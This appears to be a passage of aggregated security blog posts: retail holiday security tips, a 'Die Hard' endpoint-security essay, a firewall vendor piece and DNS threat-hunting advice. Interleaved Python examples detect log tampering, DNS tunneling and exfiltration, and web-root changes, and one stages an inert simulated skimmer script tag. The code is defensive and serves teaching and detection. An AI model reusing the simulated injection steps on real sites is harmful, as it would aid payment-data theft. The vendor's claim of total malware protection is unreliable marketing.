  1. Establish goals for the testing. Since penetration testing is intended to simulate a real-world attack, consider scenarios that are relevant to your organization. Giving thought to what type of data is at risk or what type of attacker you’re trying to simulate will allow the testers to more closely approximate threats relevant to your organization.
  2. Draft a thorough contract to state the expectations and scope of the project. For example, if there are specific areas a penetration tester should not access based on criticality or sensitivity, such as production servers or credit card data, outline these points in the contract. Also, define whether the penetration testers should attempt to compromise both physical access and remote access to compromise networks, or if just one is preferred. Consider if you wish to have social engineering included within the test as well.
  3. Have the vendor and its employees sign nondisclosure agreements (NDAs) to keep their findings confidential and ensure their exclusive use by the organization.

Penetration testers from reputable companies are thoroughly vetted before being allowed to conduct these tests. The retail industry can benefit from this type of testing because it mimics the actions of a threat actor and can reveal specific weaknesses about an organization. It can even uncover deficiencies in staff training and operational procedures if social engineering is included within the scope of the testing.

3. Check Your Log Files for Anomalies

Log data collected by different systems throughout an organization is critical in investigating and responding to attacks. Bad actors know this and, if they manage to breach an organization and gain elevated privileges, will work to cover up their tracks by tampering with logs.

According to IBM X-Force Incident Response and Intelligence Services (IRIS) research, one of the most common tactics malicious actors employ is post-intrusion log manipulation. In looking to keep their actions concealed, attackers will attempt to manipulate or delete entries, or inject fake entries, from log files. Compromising the integrity of security logs can delay defenders’ efforts to find out about malicious activity. Additional controls and log monitoring can help security teams avoid this situation.

Below are some helpful tips and examples of security logs that must be checked to determine whether anything is out of the ordinary.

  • Are your logs being tampered with? Look for altered timestamps, missing entries, additional or duplicate entries, and anomalous login attempts.
  • Transfer old log files to a restricted zone on your network. This can help preserve the data and create space for logs being generated overnight.
  • Use a security information and event management (SIEM) tool to assist with analyzing logs and identifying anomalies reported by your organization’s security controls.
  • To include as many sources of information as possible, plug in endpoint, server, network, transaction and security logs for analysis by a SIEM system. Look for red flags such as multiple failed logins, denied access to sensitive areas, ping sweeps, etc.
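The tampering signs listed above, as an added example that is not code from the original post: an audit over constructed log records that carry a sequence number and a UTC timestamp (the record format and the failed-login threshold are assumptions). It flags missing and duplicated records, timestamps that run backwards, repeated failed logins and a success that follows them.

```python
"""Log integrity checks for signs of tampering and anomalous logins.

Each constructed record is "<seq> <ISO-8601 UTC timestamp> <host> <message>",
as a collector might stamp it. The audit reports gaps in the sequence,
duplicate records, timestamp regressions and repeated failed logins.
"""
import re
from datetime import datetime

# Constructed sample: a brute-force run against "admin", two records that are
# missing (1007, 1008), a backdated record and an injected duplicate.
SAMPLE_LOG = """\
1001 2018-12-03T09:00:01Z pos-01 sshd: Accepted password for cashier from 10.0.5.20
1002 2018-12-03T09:00:07Z pos-01 sshd: Failed password for admin from 10.0.5.77
1003 2018-12-03T09:00:09Z pos-01 sshd: Failed password for admin from 10.0.5.77
1004 2018-12-03T09:00:11Z pos-01 sshd: Failed password for admin from 10.0.5.77
1005 2018-12-03T09:00:13Z pos-01 sshd: Failed password for admin from 10.0.5.77
1006 2018-12-03T09:00:15Z pos-01 sshd: Accepted password for admin from 10.0.5.77
1009 2018-12-03T09:02:00Z pos-01 cron: job nightly-sync started
1010 2018-12-03T08:59:00Z pos-01 sshd: session closed for admin
1010 2018-12-03T08:59:00Z pos-01 sshd: session closed for admin
"""

FAILED_LOGIN = re.compile(r"Failed password for (\S+) from (\S+)")
ACCEPTED_LOGIN = re.compile(r"Accepted password for (\S+) from (\S+)")


def parse_record(line: str):
    seq, ts, host, message = line.split(" ", 3)
    return int(seq), datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), host, message


def audit_log(text: str, failed_threshold: int = 3) -> list:
    """Returns [(kind, seq, detail), ...] in the order the signs are met."""
    findings = []
    seen, failures = set(), {}
    expected = last_ts = None
    for line in text.splitlines():
        if not line.strip():
            continue
        seq, ts, _host, message = parse_record(line)
        if seq in seen:
            findings.append(("duplicate", seq, f"record {seq} appears more than once"))
            continue  # an injected copy must not disturb the other checks
        if expected is not None and seq > expected:
            missing = str(expected) if seq - expected == 1 else f"{expected}-{seq - 1}"
            findings.append(("gap", seq, f"missing record(s) {missing}"))
        seen.add(seq)
        expected = max(expected or 0, seq + 1)
        # Compare against the latest timestamp seen so far, so only the
        # backdated record fires, not every legitimate record after it.
        if last_ts is not None and ts < last_ts:
            findings.append(("regression", seq,
                             f"timestamp {ts:%H:%M:%S} is earlier than the latest record before it"))
        last_ts = ts if last_ts is None else max(last_ts, ts)
        m = FAILED_LOGIN.search(message)
        if m:
            key = (m.group(1), m.group(2))
            failures[key] = failures.get(key, 0) + 1
            if failures[key] == failed_threshold:
                findings.append(("failed_logins", seq,
                                 f"{failed_threshold} failed logins for {key[0]} from {key[1]}"))
        m = ACCEPTED_LOGIN.search(message)
        if m and failures.get((m.group(1), m.group(2)), 0) >= failed_threshold:
            findings.append(("success_after_failures", seq,
                             f"{m.group(1)} from {m.group(2)} succeeded after repeated failures"))
    return findings


if __name__ == "__main__":
    for kind, seq, detail in audit_log(SAMPLE_LOG):
        print(f"{kind:22s} seq={seq} {detail}")
```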

Knowing which logs to investigate is also critical to successful log analysis. For example, point-of-sale (POS) systems are often installed on Microsoft Windows or Linux systems. It is therefore critical to review operating system logs for these particular endpoints. When it comes to POS networks, where many of the devices are decentralized, daily usage, security and application logs are good places to look for anomalies.

For network security, use logs from network appliances to determine failed or excessive login attempts, increases or decreases in traffic flow, and unauthorized access by users with inadequate privilege levels.

4. Balance Your Network and Website Traffic

According to the National Retail Federation, online sales from November and December 2017 generated more than $138.4 billion, topping 2016 sales by 11.5 percent. This year is likely going to set its own record. With internet traffic volumes expected to be at their highest, online retailers that are unprepared could see the loss of sales and damaged reputation in the aftermath of the holiday season.

But preparing for extra shoppers is the least of retailers’ worries; attackers may take advantage of the festive time of year to extort money by launching distributed denial-of-service (DDoS) attacks against retail websites. These attacks work by flooding a website or network with more traffic than it can handle, causing it to cease accepting requests and stop responding.

To stay ahead of such attacks, online retailers can opt to use designated controls such as load balancers. Load balancers are an integral part of preventing DDoS attacks, which can affect POS systems storewide. With a well-coordinated DDoS attack, a malicious actor could shut down large parts of their target’s networks.

One best practice is to prepare before traffic peaks. Below are some additional tips for a more balanced holiday season.

  • Preventing a DDoS attack can be an imposing undertaking, but with a load balancing device, most of this work can be automated.
  • Load balancers can be either hardware devices or virtual balancers that work to distribute traffic as efficiently as possible and route it to the server or node that can best serve the customer at that given moment. In cases of high traffic, it may take several load balancers to do the work, so evaluate and balance accordingly.
  • Load balancers can be programmed to direct traffic to servers dedicated to customer-facing traffic. Using them can also enable you to move traffic to the proper location instead of inadvertently allowing access to forbidden areas.

Load balancers are typically employed by larger companies with a prominent web footprint. However, smaller companies should still consider employing them because they serve a multitude of purposes. Keeping the load on your servers balanced can help network and website activity run smoothly year-round and prevent DDoS attacks from doing serious damage to your organization’s operations or web presence.

5. Plan and Practice Your Incident Response Strategy

An incident response (IR) plan is essential to identifying and recovering from a security incident. Security incidents should be investigated until they have been classified as true or false positives. The more timely and coordinated an organization’s response is to an incident, the faster it can limit and manage the impact. A solid IR plan can help contain an incident rapidly and result in better protection of customer data, reduction of breach costs and preservation of the organization’s reputation.

If your enterprise does not have an IR plan, now is the time to create one. In the event that your enterprise already has a plan, take the time to get key stakeholders together to review it and ensure it is up-to-date. Most importantly, test and drill the plan and document its effectiveness so you’re prepared for the attack scenarios most relevant to your organization.

When evaluating an IR plan, consider the following tips to help accelerate your organization’s response time:

  • Threat actors who compromise retail cybersecurity will typically turn stolen data around quickly for a profit on the dark web. Use dark web search tools to look for customer data that may have been compromised. Sometimes, data can be identified by the vendor that lost it, leading to the detection of an ongoing attack.
  • Before an attack occurs, establish a dedicated IR team with members from different departments in the organization.
  • Make sure each team member knows his or her precise role in the case of an incident.
  • Keep escalation charts and runbooks readily available to responders, and make sure copies are available offline and duplicated in different physical locations.
  • Test your IR strategy under pressure in an immersive cyberattack simulation to find out where the team is strong and what may still need some fine-tuning.

Make Retail Cybersecurity a Year-Round Priority

Increased vigilance is important for retailers during the holiday season, but these network security basics and practices can, and should, be maintained throughout the year. Remember, attackers don’t just wait until the holiday season to strike. With year-round preparation, security teams can mitigate the majority of threats that come their way.


The post 5 More Retail Cybersecurity Practices to Keep Your Data Safe Beyond the Holidays appeared first on Security Intelligence.

Endpoint Management Missteps in the ‘Die Hard’ Franchise: Viewing a Holiday Favorite Through a Cybersecurity Lens

“Die Hard” is likely the greatest Christmas movie of all time — especially when viewed from an endpoint management perspective. Perhaps you prefer the classic “It’s a Wonderful Life” or, more controversially, “A Christmas Prince.” But it’s hard to argue with the fact that the 1988 heist movie starring Bruce Willis delivers some real thrills.

“Die Hard” has everything: a high-stakes hostage situation, four sequels and loads of snappy dialogue. Nothing inspires holiday cheer like full-screen explosions and a barefoot underdog hanging by his fingertips in an elevator shaft. And if you know what to look for, the films are also packed with Internet of Things (IoT) vulnerabilities, social engineering and user governance failures.

“Die Hard” was almost certainly created with the primary purpose of delivering pure VHS entertainment. However, it unintentionally explores some IT questions that are still relevant 30 years later, such as how to implement strong endpoint security — or how not to. A December marathon of all five “Die Hard” films makes for surprisingly valuable endpoint management research for contemporary cybersecurity professionals.

What Can ‘Die Hard’ Teach Us About Endpoint Management?

As the Nakatomi Corporation staff is celebrating on Dec. 24, the building security guard is shot by a team of terrorists. Within minutes, the sole hacker on the team, Theo, has used the security guard’s computer to commandeer rudimentary smart systems — elevators, doors and surveillance — to nearly steal $640 million in bearer bonds.

“Die Hard” wasn’t written for an audience of cybersecurity professionals 30 years in the future, and few details are given about the hacking methods used. Theo is portrayed as a one-dimensional character: an agreeable genius who can solve any puzzle in seconds, from escalating credentials to drilling vaults. When asked if he can do the impossible, he beams affirmatively at the lead terrorist Hans:

“You didn’t bring me along for my charming personality.”

Sure, it was the 1980s, but Nakatomi Corporation’s endpoint sins set the whole film in motion. If the security guard’s computer had been protected with stronger user authentication and the building’s smart systems were segregated, perhaps even hacking genius Theo couldn’t have launched a $640 million heist with a few clicks.

Fast-Forward to Today’s IoT Risks

In the 1990 sequel, “Die Harder,” a team led by former special forces colonel William Stewart remotely hacks into the air traffic control system of Washington D.C.’s Dulles Airport. Stewart’s team turns off all airport lights and cuts in-flight communications. The fourth installment, 2007’s “Live Free or Die Hard,” features a financially motivated cyberattack on FBI financial databases. The same nefarious hackers later crack the communication systems of an F-35B Lightning II fighter jet and use social engineering tactics to impersonate a flight controller.

These plot twists are brought to you by the same IoT risks we face today in an increasingly smart and interconnected world. In late July, IBM X-Force presented research on four common smart city devices that revealed 17 security vulnerabilities, including nine critical flaws. The same week, researcher Ruben Santamarta shared vulnerabilities in the IoT global satellite communication system (SATCOM) that could potentially disable in-flight communications for commercial aircraft.

Unlike in 1990, IoT technology adoption is on the rise, and attacks are growing. According to a Ponemon Institute report titled “The Internet of Things (IoT): A New Era of Third-Party Risk,” 21 percent of organizations reported data breaches related to unsecured IoT devices this year, and cyberattacks involving IoT devices increased by 5 percent between 2017 and 2018.

The IoT security failures in the “Die Hard” franchise are, first and foremost, narrative tools. Had the company known how to implement stronger endpoint security, audiences wouldn’t be able to enjoy hours of explosions and near-misses. Still, it is worth wondering why those IoT threats are more relevant today than the hairstyles sported by the franchise’s cast members.

There Are No Endpoint Management Miracles

“For many of us, Christmas films are as much a part of the psychological and emotional preparation for the season as mince pies and mulled wine,” wrote Natalie Haynes of the BBC. She argued that the formula that defines a great Christmas film is more complex than films designed to evoke heartwarming feelings.

One theme that unites many movies we return to each December is the idea of miracles — and the triumph of NYPD cop John McClane over many terrorists on Christmas Eve in Nakatomi Plaza is nothing short of miraculous.

While viewing the “Die Hard” franchise through an endpoint security lens is a strictly optional exercise, there’s value in considering how such an incredible movie could have ended in the first 30 minutes if the building’s operators had taken the time to implement stronger endpoint security. As it turns out, these decades-old exploits resemble vulnerabilities that persist in the enterprise today.

Trust-based authentication or biometrics, behavioral analytics, and embedded security for IoT devices could have allowed Bruce Willis’s heroic character to enjoy Christmas with his family instead of fighting evil in bare feet. But then we would’ve missed out on so many ageless one-liners.

“Now I have a machine gun, ho-ho-ho.”

The post Endpoint Management Missteps in the ‘Die Hard’ Franchise: Viewing a Holiday Favorite Through a Cybersecurity Lens appeared first on Security Intelligence.

Preventing Illness On Your Network With The Right Medicine.

By Ronald Sens, EMEA Director for A10 Networks

As viruses become more sophisticated, malware must be detected all the way down to its DNA.

The winter season is peak time for infection and disease across the UK. But the old saying “prevention is better than cure” is not only relevant to our personal health, but also to our networks and IT systems.

In corporate networks, the classic defence against malware and other external attacks is usually split between two solutions: a firewall and a traditional antivirus program. The firewall is similar to a gate that only allows authorised personnel into the network, and the antivirus program is a guard capturing those who attempt to sneak in undetected.

Balancing act

The classic defence of using two solutions was put into place because neither solution alone could accurately protect the network. The two needed to work together in order to achieve maximum effect and coverage.

Traditional firewalls simply followed pre-determined web protocols and lacked the intelligence of next-generation firewalls. This means that the classic firewall lacked the ability to distinguish between different kinds of web traffic. The inability to distinguish between legitimate traffic and abnormal, malicious traffic meant that firewalls either accepted or rejected all the traffic sent their way.
Enterprises needed a more robust form of security with newer, more complex rules. This is why traditional antivirus programs were paired up with firewalls.

Antivirus software is reactive and while these programs can deal with a threat, they only do so once that threat has entered the network. Depending on the number of threats attacking simultaneously and the sophistication of the attack an antivirus program is not powerful enough to keep the network safe.

However, when paired with a firewall that holds back all traffic entering the network, the antivirus has the chance to scan the traffic and identify it. The antivirus can distinguish between the good and the bad traffic and relay this information to the firewall so it only lets in the approved traffic. The system works, but it is flawed. Time is wasted waiting for the antivirus to identify the traffic and inform the firewall, and if one of the two were to go down, the whole system crashes.

This kind of defence previously used to be enough, but as enterprise networks get more complex and as the types of external threats become more varied, having two separate solutions working together is just not sufficient.

Convergent Firewall – the impenetrable dome

The problem surrounding a two-solution balancing act can be addressed by next-generation firewalls, and one in particular is the Convergent Firewall (CFW). The CFW intelligently recognises users who have permissions, prevents unauthorised attackers and malicious infiltrators from having access, and in some cases outright destroys the invader.

In order for the CFW to be able to guarantee this comprehensive protection, an extensive amount of data and files is fed into the program in advance and broken down extensively. With the assistance of machine learning, the CFW is proof against all known malware and viruses, and can adapt to future threats. It can also distinguish between normal and abnormal behaviour from users within the network. This accurate analysis enables the CFW to detect malware in real time using digital DNA and thereby prevent the majority of malicious attacks.

To understand why this strategy makes sense, it helps to think again about the approaching flu season. The CFW is less of a conventional doctor than a kind of super medicine that can scan people down to the molecular level. It does this in order to be able to judge exactly whether a disease is present, what symptoms are to be expected and how the disease can best be cured. It’s the perfect medicine for a network in the middle of the flu season.

The post Preventing Illness On Your Network With The Right Medicine. appeared first on IT Security Guru.

Hybrid and Multi-Cloud Security: Bulletproof Software Defined Perimeter Implementations

By Don Boxely, CEO and Co-Founder at DH2i, The decentralization of today’s enterprise is a recognized fact. The multitude of cloud benefits—cheap storage, pay-per-use pricing, disaster recovery (DR), and

The post Hybrid and Multi-Cloud Security: Bulletproof Software Defined Perimeter Implementations appeared first on The Cyber Security Place.

5 Tips for Uncovering Hidden Cyberthreats with DNS Analytics

The internet has fueled growth opportunities for enterprises by allowing them to establish an online presence, communicate with customers, process transactions and provide support, among other benefits. But it’s a double-edged sword: A cyberattack that compromises these business advantages can easily result in significant losses of money, customers, credibility and reputation, and increases the risk of completely going out of business. That’s why it’s critical to have a cybersecurity strategy in place to protect your enterprise from attackers that exploit internet vulnerabilities.

How DNS Analytics Can Boost Your Defense

The Domain Name System (DNS) is one of the foundational components of the internet that malicious actors commonly exploit and use to deploy and control their attack framework. The internet relies on this system to translate names, known as Uniform Resource Locators (URLs), into numbers, known as Internet Protocol (IP) addresses. Giving each IP a unique identifier allows computers and devices to send and receive information across networks. However, DNS also opens the door for opportunistic cyberattackers to infiltrate networks and access sensitive information.

Here are five tips to help you uncover hidden cyberthreats and protect your enterprise with DNS analytics.

1. Think Like an Attacker to Defend Your Enterprise

To protect the key assets of your enterprise and allocate sufficient resources to defend them, you must understand why a threat actor would be interested in attacking your organization. Attacker motivations can vary depending on the industry and geography of your enterprise, but the typical drivers are political and ideological differences, fame and recognition, and the opportunity to make money.

When it comes to DNS, bad actors have a vast arsenal of weapons they can utilize. Some of the most common methods of attack to anticipate are distributed denial-of-service (DDoS) attacks, DNS data exfiltration, cache poisoning and fast fluxing. As enterprises increase their security spending, cyberattacks become more innovative and sophisticated, including novel ways to abuse the DNS protocol. Malware continues to be the preferred method of threat actors, and domain generation algorithms (DGAs) are still widely used, but even that method has evolved to avoid detection.

2. Make DNS Monitoring a Habit

Passive DNS data is important because it is unlikely that a new network connection lacks an associated DNS lookup. That also means that if you collect DNS data correctly, you can see most of the network activity in your environment. A more interesting question is what we can do with this data to create more local security insights. Even though it is not hard to bypass DNS lookups, network connections without one are suspicious and easy to detect.

3. Understand Communication and Traffic Patterns

Attackers leverage the DNS protocol in various ways — some of which are way ahead of our detection tools — however, there are always anomalies that we can observe in the DNS request sent out by endpoints. DNS traffic patterns vary by enterprise, so understanding what the normal pattern for your organization is will enable you to spot pattern anomalies easily.

A robust, secure system should be able to detect both DNS tunneling software and exfiltration via DNS, which is not as easy as it sounds because the two have different communication patterns. DNS tunneling software communication is reliable and frequent, the flow is bidirectional, and sessions are typically long. DNS exfiltration communication, on the other hand, is opportunistic and unexpected, and possibly unidirectional, since attackers are looking for the right moment to sneak out valuable data.

4. Get the Right Tools in Place

When analyzing which tools are the best to protect your organization against attacks leveraging DNS, consider what assets you want to protect and the outcomes you would like your analysts to achieve. There are many tools that can be pieced together to create a solution depending on your goals, such as firewalls, traffic analyzers and intrusion detection systems (IDSs).

To enhance the day-to-day activities of your security operations center (SOC) and enable your team to conduct comprehensive analysis of domain activity and assign an appropriate risk rating, your SOC analysts should take advantage of threat intelligence feeds. These feeds help analysts understand the tactics, techniques and procedures (TTPs) of attackers and provide them with a list of malicious domains to block or alert on in their security systems. When this information is correlated with internal enterprise data through a security information and event management (SIEM) platform, analysts have full visibility to detect or anticipate ongoing attacks.

5. Be Proactive and Go Threat Hunting

Technology is a very useful tool that allows us to automate processes and alerts us of suspicious activity within our networks — but it is not perfect. Threat hunting can complement and strengthen your defense strategy by proactively searching for indicators of compromise (IoC) that traditional detection tools might miss. To succeed at threat hunting, you must define a baseline within your environment and then define the anomalies that you are going to look for.

A standard method for threat hunting is searching for unusual and unknown DNS requests, which can catch intruders that have already infiltrated your system as well as would-be intruders. Some indicators of abnormal DNS requests include the number of NXDOMAIN responses received by an endpoint, the number of queries an endpoint sends out and new query patterns. If you identify a potential threat, an incident response (IR) team can help resolve and remediate the situation by analyzing the data.
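The hunting indicators in tip 5 and the tunneling-versus-exfiltration patterns in tip 3, as an added example that is not code from the original post: each client endpoint in a constructed DNS query log is profiled by NXDOMAIN ratio, query count, label length, query cadence and base domains absent from a baseline set. The log format, the reserved .test domains, the baseline domain list and all thresholds are assumptions.

```python
"""DNS threat hunting over a constructed query log.

Profiles each client's DNS requests and flags NXDOMAIN-heavy lookups
(DGA-style), long-label queries sent steadily to one domain (tunneling),
a short burst of long-label queries (exfiltration) and base domains that
never appeared during the baseline period.
"""
import hashlib
from collections import defaultdict
from statistics import median

# Domains observed during the baseline period (constructed).
BASELINE_DOMAINS = {"example.com", "example.net"}


def base_domain(qname: str) -> str:
    """Registrable domain approximated as the last two labels (no public-suffix list)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def parse_dns_log(text: str) -> list:
    """Assumed line format: '<epoch_seconds> <client_ip> <qname> <rcode>'."""
    records = []
    for line in text.splitlines():
        if line.strip():
            ts, client, qname, rcode = line.split()
            records.append((int(ts), client, qname.lower(), rcode))
    return records


def profile_clients(records: list) -> dict:
    """Per client: query total, NXDOMAIN count and, per base domain, the
    query timestamps and the length of the leftmost label."""
    profiles = {}
    for ts, client, qname, rcode in records:
        p = profiles.setdefault(client, {"total": 0, "nxdomain": 0, "domains": {}})
        p["total"] += 1
        if rcode == "NXDOMAIN":
            p["nxdomain"] += 1
        d = p["domains"].setdefault(base_domain(qname), {"ts": [], "lens": []})
        d["ts"].append(ts)
        d["lens"].append(len(qname.split(".")[0]))
    return profiles


def hunt(profiles: dict, min_queries: int = 8, long_label: int = 30,
         burst_window: int = 60) -> dict:
    """Returns {client: [finding, ...]} for clients with at least one finding."""
    findings = defaultdict(list)
    for client, p in profiles.items():
        if p["total"] >= min_queries and p["nxdomain"] / p["total"] >= 0.5:
            findings[client].append("dga_suspect")  # mostly names that do not resolve
        new = [dom for dom in p["domains"] if dom not in BASELINE_DOMAINS]
        if new:
            findings[client].append(f"new_domains:{len(new)}")
        for dom, d in p["domains"].items():
            n = len(d["ts"])
            if n < min_queries or sum(d["lens"]) / n < long_label:
                continue  # too few queries, or ordinary hostnames
            ts = sorted(d["ts"])
            gaps = [b - a for a, b in zip(ts, ts[1:])]
            if ts[-1] - ts[0] <= burst_window:
                findings[client].append(f"exfil_suspect:{dom}")  # opportunistic burst
            elif max(gaps) <= 2 * median(gaps):
                findings[client].append(f"tunnel_suspect:{dom}")  # steady cadence
    return dict(findings)


def _label(seed: str, length: int) -> str:
    """Constructed random-looking label; hex keeps it a valid DNS label."""
    return hashlib.sha256(seed.encode()).hexdigest()[:length]


def build_sample_log() -> str:
    """Constructed log: one normal client, one DGA-style client, one tunneling
    client and one exfiltrating client. The .test TLD is reserved."""
    lines = []
    for i, host in enumerate(["www.example.com", "mail.example.com", "cdn.example.net"] * 2):
        lines.append(f"{i * 300} 10.0.1.10 {host} NOERROR")
    for i in range(12):  # twelve distinct never-resolving names within a minute
        lines.append(f"{1000 + 5 * i} 10.0.1.23 {_label(f'dga{i}', 10)}{i:02d}.test NXDOMAIN")
    lines.append("1070 10.0.1.23 www.example.com NOERROR")
    lines.append("1075 10.0.1.23 mail.example.com NOERROR")
    for i in range(10):  # 40-character labels every 30 s to one domain
        lines.append(f"{2000 + 30 * i} 10.0.1.42 {_label(f'tun{i}', 40)}.t.tunnel.test NOERROR")
    for i in range(9):  # 48-character labels, nine queries within 24 s
        lines.append(f"{3000 + 3 * i} 10.0.1.77 {_label(f'exf{i}', 48)}.cdn-update.test NOERROR")
    return "\n".join(lines)


SAMPLE_DNS_LOG = build_sample_log()


def demo() -> dict:
    return hunt(profile_clients(parse_dns_log(SAMPLE_DNS_LOG)))


if __name__ == "__main__":
    for client, flags in demo().items():
        print(client, ", ".join(flags))
```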

Learn More

Every organization is unique, but by understanding the basics of DNS analytics, the common methods of attack and the tools available to security teams, you will be better prepared to protect your enterprise from hidden cyberthreats.

We invite you to attend a live webinar at 11 a.m. ET on Dec. 11 (and available on-demand thereafter) to learn even more about DNS threat hunting.


The post 5 Tips for Uncovering Hidden Cyberthreats with DNS Analytics appeared first on Security Intelligence.

5 Recommendations to Improve Retail Cybersecurity This Holiday Season

This is the first installment in a two-part series about how retailers can help protect their enterprises this holiday season.

With the holiday season upon us, retailers have an opportunity to boost revenues before the end of the year. Any increase in profit at the expense of retail cybersecurity, however, can cost a company more in the long run, given the rising size and costs of data breaches and associated revenue and reputational loss. With extra web traffic and high order volumes coming in, the holiday shopping season can be a particularly perilous time for businesses seeking to safeguard customer information.

A Timely Cause for Retail Cybersecurity Concerns

’Tis the season for retailers to buckle down on security, since data breaches typically peak just prior to and during the holiday shopping season. IBM X-Force Incident Response and Intelligence Services (IRIS)’s assessment of X-Force Interactive Security Incident data recorded between 2012 and 2017 revealed that 41 percent of all retail and consumer product breaches occurred between September and December, elevating the risk for enterprise network breaches during that time of year. More than two-thirds of all records in the consumer products sector were leaked, lost or stolen during these last four months of the year — that’s nearly 180 million records each year.

Don’t Reward the Naughty

A growing number of retailers now offer rewards programs to retain and nurture their customer bases. For shoppers to join these programs, most retailers ask for personally identifiable information (PII) such as name, address, phone number and email address. If this data is ever compromised, an attacker can correlate the customer PII with payment data and aggregate enough information to compromise the user’s identity.

In line with recent regulations such as the General Data Protection Regulation (GDPR), retailers should collect the least possible amount of PII on customers, have a clear purpose for each data element, and make sure to always keep data encrypted and safeguarded, both in transit and at rest.

Phishing Is in Season

Attackers don’t wait for the holiday season to begin launching spam campaigns, which are often employed as the first stage of their overall fraud and attack campaigns. Analysis of X-Force spam honeypot data collected between 2015 and 2018 revealed a notable rise in the average volume of spam emails beginning in August, with September slightly lower and October ranking third.

Figure 1: Average Spam per Month. Total volume of spam emails recorded, 2015–2018 (Source: IBM X-Force)

Preventing and responding to data breaches leading up to and during the holiday shopping season has become imperative. It is incumbent on retail security professionals to perform due diligence during this time, and there are several ways to accomplish this goal.

Below are five holiday season tips for retailers to help make your enterprise a safer shopping environment. These techniques can help retailers identify impending data breaches and sidestep the costs associated with a major data breach.

While I’ve listed these tips in the order of what I generally consider to be top-of-mind for retailers, this list can be customized to serve your organization’s specific needs.

1. Mitigate the POS Malware Threat

After a popular big box retailer suffered a breach in 2013, public awareness around the vulnerability of point-of-sale (POS) systems grew exponentially. That breach was facilitated by malware that infected POS machines and helped threat actors access a large volume of credit card information to sell to other criminals on the dark web. This intrusion resulted in the theft of more than 110 million records.

Five years later, POS malware continues to plague retailers. According to IBM X-Force, 74 percent of publicly reported POS malware breaches in 2017 impacted the retail sector. X-Force IRIS has observed malicious actors using POS malware, such as FrameworkPOS and PoSeidon, to siphon credit card data from POS terminals. Web-based malware, which steals credit card data on the fly as online transactions are processed, is also gaining steam.

To help mitigate these risks, both in physical and virtual realms, retailers should take the following steps:

  • Use some form of malware detection across your entire network, including the network of POS systems.
  • Test the devices’ hardware and software (more to come on penetration testing in the second installment of this series) and keep devices up-to-date through regular patching.
  • Work with a supplier that will contractually adhere to both your regulatory standards and security requirements.
  • When using mobile POS, have controls in place to ensure the integrity of the hand-held device and the encryption of its communication channels with the server that processes and stores card data.
  • Ensure any mobile payment system is from a trusted provider that supplies regular updates, patches, and equipment upgrades to comply with advances in encryption requirements and evolving threats.

Cybercriminals also commonly steal credit card data with payment card skimmers. These physical devices are fitted over or inside the mouth of a card reader; they read the magnetic-stripe track data as the card passes through and store it on a memory chip inside the skimmer for later retrieval. Beyond retail stores, skimmers are often found on ATMs and at restaurants and gas stations.

As a precaution, retailers should inspect their POS terminals and card readers for foreign devices frequently. Attackers typically attach a skimmer by sliding it over the reader and collect it later. Examine devices daily and pull on the reader if anything looks different; if part of the device comes away, it may be a skimmer. Report it to your service provider and IT security team before resuming activity on that terminal.

As these inspections have become routine, threat actors have resorted to gluing skimmers onto machines, so a skimmer can no longer be detected simply by pulling on it. Retailers should train employees at every location to recognize the proper look and components of their POS terminals and card readers, and make sure they know how to report a suspicious device.

2. A Clean Network Is a Safe Network

Payment card data carries immediate monetary value to criminals, and there are many methods by which they aim to steal it.

One tactic IBM X-Force researchers have seen increasingly often is the injection of malicious code into legitimate e-commerce websites. By compromising websites where people shop online, attackers can send payment data submitted during customer checkout to their own infrastructure.

To help reduce the likelihood of becoming a feeding ground for criminals, online retailers should take the following steps:

  • Harden the underlying web servers.
  • Limit access to critical assets and properly manage the privileges of those who maintain them.
  • Harden web applications against SQL injection and other common attacks, and have them tested regularly.
  • Deploy a change monitoring and detection solution to spot unauthorized modifications to your e-commerce platform’s web hosting directories; modified or newly added files in the document root are the usual footprint of an injected skimmer script, and a hash baseline will catch them. If this is not feasible, schedule periodic manual reviews of these assets.
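As an added illustration of the last point (example code written for this page, not IBM’s or any vendor’s product), the script below takes a SHA-256 baseline of the web-facing files under a document root and then reports files that were added, removed or modified. The document root layout, the file names, the watched suffixes and the simulated injection in demo_tampering() are all constructed for the example; in practice the baseline is taken from a known-good deployment and the comparison runs on a schedule or after each release.

```python
"""Hash-based change detection for an e-commerce document root (added example)."""
import hashlib
import json
import tempfile
from pathlib import Path

# File types that end up in a shopper's browser or build the page server-side;
# an injected skimmer has to live in one of these. Assumed list for the example.
WATCHED_SUFFIXES = (".js", ".html", ".htm", ".php")


def hash_file(path: Path) -> str:
    """SHA-256 of a file, read in 64 KiB chunks so large assets are not loaded whole."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(docroot: Path) -> dict:
    """Map each watched file (path relative to docroot, POSIX form) to its hash."""
    return {
        p.relative_to(docroot).as_posix(): hash_file(p)
        for p in sorted(docroot.rglob("*"))
        if p.is_file() and p.suffix.lower() in WATCHED_SUFFIXES
    }


def save_baseline(snap: dict, path: Path) -> None:
    path.write_text(json.dumps(snap, indent=2, sort_keys=True))


def load_baseline(path: Path) -> dict:
    return json.loads(path.read_text())


def diff_snapshots(baseline: dict, current: dict) -> dict:
    """Classify every path as added, removed or modified relative to the baseline."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in baseline.keys() & current.keys() if baseline[k] != current[k]),
    }


def demo_tampering() -> dict:
    """Build a throwaway docroot, baseline it, then simulate a skimmer injection.

    File names and contents are hypothetical and constructed for this example only.
    """
    with tempfile.TemporaryDirectory() as tmp:
        docroot = Path(tmp) / "htdocs"
        (docroot / "js").mkdir(parents=True)
        (docroot / "checkout.html").write_text("<html><body><form id='pay'></form></body></html>")
        (docroot / "js" / "cart.js").write_text("console.log('cart');")
        (docroot / "logo.png").write_bytes(b"\x89PNG fake")  # not watched: never appears in the diff

        baseline_file = Path(tmp) / "baseline.json"
        save_baseline(snapshot(docroot), baseline_file)

        # Simulated compromise: a script tag appended to the checkout page and a new loader dropped.
        with (docroot / "checkout.html").open("a") as page:
            page.write("<script src='/js/analytics-helper.js'></script>")
        (docroot / "js" / "analytics-helper.js").write_text("/* would exfiltrate form fields */")

        return diff_snapshots(load_baseline(baseline_file), snapshot(docroot))


if __name__ == "__main__":
    print(json.dumps(demo_tampering(), indent=2))
```

Store the baseline file outside the web server’s reach (and ideally off the host), since an attacker who can write to the document root can otherwise rewrite the baseline to match.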

